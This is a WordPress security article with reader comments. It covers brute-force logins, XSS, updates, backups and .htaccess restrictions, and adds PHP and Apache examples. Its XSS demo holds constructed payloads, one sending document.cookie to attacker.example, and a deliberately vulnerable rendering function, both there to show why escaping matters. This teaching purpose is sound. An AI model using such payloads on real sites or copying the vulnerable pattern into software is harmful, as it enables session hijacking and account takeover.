WordPress is known as the best blogging platform for a reason. Most people know it as a capable CMS with a large number of features and functions, and one of its strengths is the wealth of plugins and resources available to extend the functionality of any website.
The recent attack on WordPress blogs by unidentified hackers has brought the vulnerability of WordPress to attention. Categorized as "brute force" attacks, they made the news and reminded WordPress site owners, once again, that it is in their best interests to follow security best practices.
The Evolution of WordPress
It has taken WordPress 10 years to become the most popular web content management system in the world. It is estimated that 22% of new sites, and approximately 60 million sites in all, are powered by WordPress. CNN, eBay, Forbes and Sony are just some of the leading brands that maintain WordPress sites. The CMS generates over 4 billion page views and close to 40 million posts each month. According to website monitoring service Pingdom, WordPress is the blogging system of choice for the world's top 100 blogs.
These numbers give an idea of the massive impact of WordPress on the businesses and individuals that depend on it, and of why it is such an attractive target.
Even as WordPress has evolved, sites and blogs powered by it have become favorite targets of hackers, precisely because one working exploit applies to millions of installs. The bottom line is that WordPress security must be taken seriously. If you are not aware of the security risks and the mitigations/controls you can use to bring those risks to acceptable levels, read on.
To understand how you can safeguard your WordPress site against malicious intent, you first need to know about the vulnerabilities in the system. An idea of the ways in which your WordPress site/blog can be attacked prepares you for counter-measures at your end. These are the most common attacks on WordPress-powered sites:
If your site has been the victim of a brute force attack, it can be assumed right off the bat that your username and password were not up to the mark. This type of attack simply tries username and password combinations until one works. So, if you still have the default "admin" username or a weak password, you are extending an open invitation. Brute force attacks don't stop after one failed attempt; attackers keep at it, often from many IP addresses at once, until they get the better of you. The persistent attempts also cause performance problems: every attempt against wp-login.php (or the XML-RPC endpoint, which accepts credentials too) loads WordPress and runs a password hash, which takes a toll on server CPU and memory.
How do you prevent it? The basic precautionary measure is to stop using the "admin" username. Create a unique, hard-to-guess user with Administrator rights. If your name is Jennifer or Tim, and you display it publicly on your blog, don't use it as your username; that makes it too easy to guess. Keep in mind that WordPress exposes author usernames through author archive URLs, so renaming admin slows guessing but does not hide the username entirely. It cannot be emphasized enough how important a strong password is. A good one is long and mixes lower and upper case letters, symbols and numbers. Two examples of this style are B5l(78)O12g9 and IlOve&28BlOg (and, now that they are published, neither should actually be used). Be aware that a dictionary word with a few substituted characters is the first pattern cracking tools try, so a long random password kept in a password manager is the safer choice. Here are some don'ts of creating a password:
You can also consider installing a login limiter for WordPress. This quarantines or blocks a username/IP address that fails login requests above a specific threshold rate. For instance, a penalty time-out of one hour can be imposed after 10 failed attempts within 5 minutes. Such limits discourage and frustrate hackers because they cannot try enough variations to gain illegal access. One caveat: a distributed attack that spreads its attempts across many IP addresses stays under a per-IP limit, so count failures per username as well as per address.
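The limiter described above, as an added example rather than code from the original article or from any of the plugins it names: a sliding-window counter that locks an IP+username pair out for an hour after 10 failures in 5 minutes. Storage is abstracted so the same class runs stand-alone with an in-memory array and, inside WordPress, with transients. The hook names (authenticate, wp_login_failed, wp_login) and the transient functions are WordPress's own; the policy numbers, the transient key prefix, the class name and the sample address are assumptions.

```php
<?php
// Added example, not code from the original article. Policy: 10 failures within
// a 300 s window lock the key out for 3600 s. Storage callables let the class
// run with an array (demo below) or WordPress transients (wiring at the bottom).
final class LoginLimiter
{
    private $load;    // callable(string $key): ?array   -> stored state or null
    private $save;    // callable(string $key, ?array $state, int $ttl): void (null = delete)
    private $max;
    private $window;
    private $lockout;

    public function __construct(callable $load, callable $save, int $max = 10, int $window = 300, int $lockout = 3600)
    {
        $this->load = $load;
        $this->save = $save;
        $this->max = $max;
        $this->window = $window;
        $this->lockout = $lockout;
    }

    // Key on IP *and* username: one host spraying many accounts and many hosts
    // hammering one account are both throttled. Hashing keeps the transient name
    // short and free of characters that are unsafe in option names.
    public static function key(string $ip, string $username): string
    {
        return 'login_limit_' . hash('sha256', $ip . '|' . strtolower($username));
    }

    // Seconds of lock-out remaining, 0 if not locked.
    public function lockedFor(string $key, int $now): int
    {
        $s = ($this->load)($key) ?? [];
        $until = $s['locked_until'] ?? 0;
        return $until > $now ? $until - $now : 0;
    }

    // Record a failed login; returns true when the key is (now) locked out.
    public function recordFailure(string $key, int $now): bool
    {
        $s = ($this->load)($key) ?? [];
        if (($s['locked_until'] ?? 0) > $now) {
            return true; // already locked: a fresh failure must not reset the clock
        }
        // Drop failures that fell out of the sliding window, then add this one.
        $fails = array_values(array_filter($s['fails'] ?? [], fn ($t) => $t > $now - $this->window));
        $fails[] = $now;
        if (count($fails) >= $this->max) {
            ($this->save)($key, ['fails' => [], 'locked_until' => $now + $this->lockout], $this->lockout);
            return true;
        }
        ($this->save)($key, ['fails' => $fails], $this->window);
        return false;
    }

    public function recordSuccess(string $key): void
    {
        ($this->save)($key, null, 0);
    }
}

// Stand-alone demonstration: in-memory store, fixed clock, constructed input.
function login_limiter_demo(): array
{
    $store = [];
    $lim = new LoginLimiter(
        function (string $k) use (&$store) { return $store[$k] ?? null; },
        function (string $k, ?array $v, int $ttl) use (&$store) {
            if ($v === null) { unset($store[$k]); } else { $store[$k] = $v; }
        }
    );
    $key = LoginLimiter::key('203.0.113.7', 'Admin'); // documentation-range address
    $t0 = 1700000000;
    $lockedOn = 0;
    for ($i = 1; $i <= 12; $i++) {                 // 12 failures, 10 s apart
        if ($lim->recordFailure($key, $t0 + $i * 10) && $lockedOn === 0) {
            $lockedOn = $i;                          // 10th failure triggers the lock
        }
    }
    return [
        'locked_on_attempt' => $lockedOn,                          // 10
        'seconds_remaining' => $lim->lockedFor($key, $t0 + 121),   // 3579 (locked at t0+100)
        'after_one_hour'    => $lim->lockedFor($key, $t0 + 3700),  // 0
    ];
}

// WordPress wiring: drop this file into wp-content/mu-plugins/. Runs only when
// WordPress has loaded; transients persist the state across requests.
if (function_exists('add_action')) {
    $limiter = new LoginLimiter(
        fn (string $k) => get_transient($k) ?: null,
        function (string $k, ?array $v, int $ttl) { $v === null ? delete_transient($k) : set_transient($k, $v, $ttl); }
    );
    // REMOTE_ADDR is the real client only when no reverse proxy sits in front.
    $ip = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    add_filter('authenticate', function ($user, $username) use ($limiter, $ip) {
        $wait = $limiter->lockedFor(LoginLimiter::key($ip, (string) $username), time());
        return $wait > 0 ? new WP_Error('too_many_attempts', 'Too many failed logins; try again later.') : $user;
    }, 30, 2);
    add_action('wp_login_failed', fn (string $username) => $limiter->recordFailure(LoginLimiter::key($ip, $username), time()));
    add_action('wp_login', fn (string $username) => $limiter->recordSuccess(LoginLimiter::key($ip, $username)));
}
```

The authenticate filter runs at priority 30, after WordPress's own username/password check at 20, so a correct password is rejected for the duration of the lock-out as well; otherwise an attacker who guessed right on the tenth try would still get in. Hook the same key function into the XML-RPC login path if you leave xmlrpc.php enabled.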
Abbreviated as XSS, cross-site scripting allows attackers to inject client-side script into web pages viewed by other users. The script runs in the victim's browser with the victim's session, which is how it circumvents access controls.
In script injection, attackers look for one of your site's input elements, such as a name, search, comment or contact field, whose value is written back into a page without escaping, and supply HTML or JavaScript instead of plain text. There are many ways in which such an attack can compromise your WordPress site. Attackers may get data into your database and make it visible to your visitors, steal sensitive customer or financial information, impersonate users by stealing session cookies and hijacking logged-in sessions (an administrator's session lets them install plugins or create users), and even deface or bring down your entire site.
How can you prevent it? Validate input (accept only what each field should contain) and, more importantly, escape every value at the point of output with the function that matches the context: esc_html() for text, esc_attr() inside attributes, esc_url() for links, and wp_kses_post() where limited HTML must be allowed. Output escaping is the measure that also covers data which arrived from the database, a plugin or an import rather than directly from a form. As these techniques take some technical background, it is best to look them up and understand them in their entirety for successful application.
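The difference between concatenating input and escaping it, as an added example that is not code from the original article: one "search results" fragment rendered both ways, with a constructed payload for each of the three HTML contexts it writes into. esc_html(), esc_attr() and esc_url() are WordPress's real escaping helpers; the fallbacks defined below exist only so the file runs stand-alone with the php CLI and are simplified approximations of the WordPress implementations, not replacements for them.

```php
<?php
// Added example, not code from the original article. Fallbacks make the file
// runnable outside WordPress; when WordPress is loaded, its own esc_* functions
// are used and these definitions are skipped.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
    function esc_attr(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
    function esc_url(string $s): string {
        // Simplified: allow only http(s) or site-relative URLs, so javascript:
        // and data: schemes are dropped, then escape for the attribute context.
        $s = trim($s);
        if ($s === '' || !preg_match('#^(https?://|/)#i', $s)) { return ''; }
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// VULNERABLE: untrusted input concatenated straight into three HTML contexts.
function render_results_vulnerable(string $q): string
{
    return '<h2>Results for ' . $q . '</h2>'
         . '<input name="s" value="' . $q . '">'
         . '<a href="' . $q . '">search again</a>';
}

// HARDENED: escape at the point of output with the function for each context.
// Input sanitizing (e.g. sanitize_text_field()) is a useful extra layer, but it
// does nothing for values that reached the database some other way.
function render_results_escaped(string $q): string
{
    return '<h2>Results for ' . esc_html($q) . '</h2>'
         . '<input name="s" value="' . esc_attr($q) . '">'
         . '<a href="' . esc_url($q) . '">search again</a>';
}

// Crude detector for a script tag, a live event handler or a javascript: link.
function attacker_markup_present(string $html): bool
{
    return (bool) preg_match('/<script|\sonfocus="|href="javascript:/i', $html);
}

// For each constructed payload: does the attacker's markup survive each renderer?
function xss_demo(): array
{
    $payloads = [
        'script_in_text'    => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
        'break_out_of_attr' => '" autofocus onfocus="alert(document.cookie)',
        'js_scheme_in_href' => 'javascript:alert(document.cookie)',
    ];
    $report = [];
    foreach ($payloads as $name => $p) {
        $report[$name] = [
            'vulnerable_executes' => attacker_markup_present(render_results_vulnerable($p)), // true
            'escaped_executes'    => attacker_markup_present(render_results_escaped($p)),    // false
        ];
    }
    return $report;
}
```

Note that the attribute payload never contains a < character, so a filter that only strips tags would pass it through; only escaping the quote for the attribute context stops it. Likewise the javascript: link is harmless text inside the h2 but an executable URL inside href, which is why the function must follow the context, not the data.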
It is not uncommon to hear about attacks on older WordPress versions. Old releases are targeted precisely because the fixes, and therefore the bugs, are public; any version older than the current release (3.5.1 at the time of writing) is missing known security fixes, so "newer than 2.8.3" is not a safe line to draw. Upgrade to the latest version. Out-of-date plugins are just as exposed, and a deactivated plugin still sits on disk where its files can be reached, so if you have been holding back on updating, it's time to do the right thing: update what you use and delete what you don't.
A good way to prevent hacking is to use quality plugins with good ratings, many downloads and active author support. Reliable authors address security issues and update their plugins accordingly.
WordPress site/blog owners can take a number of precautionary steps to strengthen security. Here are some you can invest in.
Your own computer is part of the attack surface: malware on a laptop can capture the WordPress, FTP and hosting passwords you type, so a basic technology update to keep hackers from finding loopholes is essential. A comprehensive update includes malware checks, laptop password changes and anti-virus and operating system updates. Also make sure that your operating system, ISP and router have adequate firewalls.
It is important to back up your entire site, both the database and the files (uploads, themes, plugins), using a plugin or manually, and to keep copies somewhere other than the web server, since a compromise of the server can take the backups with it. You can choose from some excellent plugins that perform automatic full-site backups, such as BackUpBuddy (available on a yearly subscription and the easiest option for restoring a WordPress site), VaultPress (monthly subscription) and WordPress Backup to Dropbox (free and premium).
As mentioned earlier, don't hold off updating plugins or WordPress itself for fear of breaking your website. Some best practices in this regard: (a) ensure that backups are current by scheduling them daily or weekly; (b) apply WordPress, plugin and theme updates at the earliest opportunity, and pay attention even to minor updates, as they often contain critical security fixes; (c) for major WordPress, theme or plugin updates, wait a short while until developers have tested the release in the wild. If you have a second WordPress install, duplicate your website there and update the copy first to determine whether it is safe to do the same on your live site.
Note: You can follow news about the latest fixes/patches on WordPress Development.
It is best to invest in a good hosting service. A provider well-versed in WordPress will handle file permissions and installation more capably, and the difference in service will be apparent to you. Partnering with a reliable service that knows WordPress does its bit for site/blog security. Here are some options:
Bluehost: A popular choice, Bluehost offers shared and upgraded shared hosting with added resources and fewer users on one server.
Dreamhost: It detects hacks proactively
WP Engine: This is a good bet if you want top-of-the-line WordPress security. From regular security scans to daily back-ups, it helps you address security issues easily and conveniently.
There are quite a few free and paid security plugins that can monitor and protect your WordPress site. Wordfence is a free security plugin offering multiple monitoring levels, and is also available as a premium plan. Bulletproof Security (limited monitoring), Sucuri (malware clean-up), WordPress Firewall 2 and VaultPress are other options you can explore. WP Security Scan is another good solution; this plugin scans your blog for vulnerabilities and reports malicious code to you. Remember that every plugin, security plugins included, is more code running with your site's privileges, so install only what you need and keep it updated.
New WordPress sites are seen as easier prey, and hackers have been observed to capitalize on this. The article's suggestion is to avoid presenting your WordPress site as a newbie by removing the "Powered by WordPress" text link in the footer, removing the default posts from the homepage and adding as many posts as possible, so the site appears to have been around for a while. Treat this as cosmetic: automated scanners fingerprint WordPress from /wp-login.php, /wp-content/ paths and the generator meta tag in the page head, not from the footer, so keeping the software current is what actually matters.
As discussed earlier, it is important that you change the default admin login and use a strong password. There is a good choice of tools to check password strength. Some you can explore are Password Meter (AskTheGeek), Password-Review (LBW-SOFT) and Password Checker (Microsoft). Never type the password you actually use into a third-party website; test a password of the same length and construction instead.
As a cautionary measure, keep visitors (and scanners) from listing the contents of your directories. Hackers study directory listings to learn which plugins, themes and versions you run. To disable directory listing, add the following to the .htaccess file in your WordPress blog's root directory (the server's AllowOverride setting must permit Options for this to take effect):
# disable directory browsing
Options -Indexes
Note: .htaccess is a per-directory configuration file read by Apache to define your website's access rules; it has no effect on nginx or other servers. Apache rejects an Options line that mixes plain and +/- keywords, so the flag is written as -Indexes on its own.
Make sure that admin files are adequately protected; only you and a limited number of bloggers should have access to them. .htaccess is one way to restrict access. Depending on whether you have a static IP address or run a multi-user blog, you can restrict wp-login.php and the wp-admin directory to a defined set of IPs. For step-by-step instructions and the exact syntax for your Apache version, look up Apache's documentation.
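One way to apply the restriction just described, as an added example rather than configuration from the original article: Apache 2.4 (mod_authz_core) syntax, with placeholder addresses from the documentation ranges and the assumption that you connect from a static address or a known range. Test from a second browser session before logging out, or you will lock yourself out.

```apache
# Added example, not from the original article. Apache 2.4 syntax; on 2.2 use
# Order/Deny/Allow instead. Replace the placeholder addresses with your own.

# --- site root .htaccess: protect the login page itself ---
<Files "wp-login.php">
    Require ip 203.0.113.10 198.51.100.0/24
</Files>

# --- wp-admin/.htaccess (a separate file; .htaccess scope is per directory) ---
Require ip 203.0.113.10 198.51.100.0/24

# admin-ajax.php is called by themes and plugins on behalf of anonymous
# visitors too, so re-open it or logged-out front-end features break.
# A <Files> section's Require replaces the directory-level one above for that file.
<Files "admin-ajax.php">
    Require all granted
</Files>
```

If the site sits behind a reverse proxy or CDN, Apache sees the proxy's address, not the visitor's; configure mod_remoteip (or the proxy's own access rules) before relying on IP-based restrictions.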
As a responsible WordPress site/blog owner, the onus is on you to address security proactively. There are multiple ways to do this. Download new WordPress software updates through the CMS backend, and when you do, verify the compatibility of the new release with your web server's MySQL and PHP versions. If you find a security bug, report it to the WordPress community at security@wordpress.org rather than publishing it. Encouraging users to report security issues is a good way for the WordPress community to stay aware of the latest threats and the effective measures at their disposal.
Spammers are just as troublesome as hackers; WordPress site owners will vouch for this. Thankfully, there are different ways in which you can combat spam. Here are a few:
There is no predicting when your WordPress site may be the target of malicious elements. If, despite your best efforts, your site is compromised, don't panic. Inform your host, let your fans and readers know (through Twitter or Facebook), work out how the attackers got in before you restore, reinstall from a clean backup rather than patching the live copy, change every password involved (WordPress users, database, FTP/SFTP and hosting control panel), check for added administrator accounts and unknown files, and, importantly, make a note of what you should have done to prevent the attack. This will help you enhance site security for the future. Also remember that it is not the end of the world: you can have your hacked WordPress site up and running fairly quickly, depending on the type and extent of the attack.
So basically what you're saying is that the solution to WordPress being insecure is 1) use a decent password and 2) use a variety of plugins (word mentioned 9 times in the article) which can themselves introduce a pile of vulnerabilities?
LOL, it takes a multitude of these amazing plugins to allow it to be called a CMS. Otherwise it is just as you first stated and nothing more than a great blog tool. However, there is an extension for Joomla called EasyBlog that puts ANYTHING that is inside WordPress to shame!!!
I completely disagree with you there, Kevin. WordPress is a compliant CMS; with just a few lines of code since version 3 you can easily add Custom Post Types to use WordPress as a powerful CMS, a few plugins for front-end posting like Gravity Forms and you're away.
Not to mention, Joomla has a terrible backend interface. It is also nowhere near as easy to update the software as WP.
great post — security is so important!
Hey Jessica! Great post, helpful for WordPress bloggers and developers as well. Every WordPress blogger wants to secure their content from attackers.
-Mike
Jessica,
Great post by the way!
If all fails, there’s a free web monitoring service that you can use to monitor your WordPress website to make sure that it’s not defaced by hackers. It’s called Content Site Monitor (contentsitemonitor.com). It allows you to specify certain content/keywords that you want to monitor and it will send you alert email if the content/keywords are missing from your site.
That way, just in case all the measures you put in place fail, you still have a final defense to revive your WordPress website before your readers find out about it.
Wow! Beautiful... hope hackers will not tamper with this new development?
Very interesting. Thanks for sharing this post!!
Some good info there, but as you say you will always stand a chance of having your site attacked... but it's good to be prepared. Thank you for sharing.
G’Day! Instantshift,
Thanks for your thoughts. I run a very small website using freehostia.com free hosting services. The website is completely down! I tried to visit freehostia.com to look for troubleshooting answers; it wasn't coming up either for about 20 mins, and is now back up again. Anybody else with the same problem? My website comes up completely blank, no error messages at all. It's connected to WordPress and I can't even log into wp-admin or the login page or anything. If the server was down, would it prevent me from accessing my WordPress login page also? Any help would be much appreciated. Thank you!
I’ll be back to read more next time
Dear admin; I'll follow all the steps from today :) Thanks for sharing your super knowledge about WordPress security.
This article is very important for me. I am very happy to read this article; thanks a lot for sharing. Thanks.
It's actually a nice and helpful piece of information. I am satisfied that you just shared this useful information with us. Please keep us informed like this. Thanks for sharing.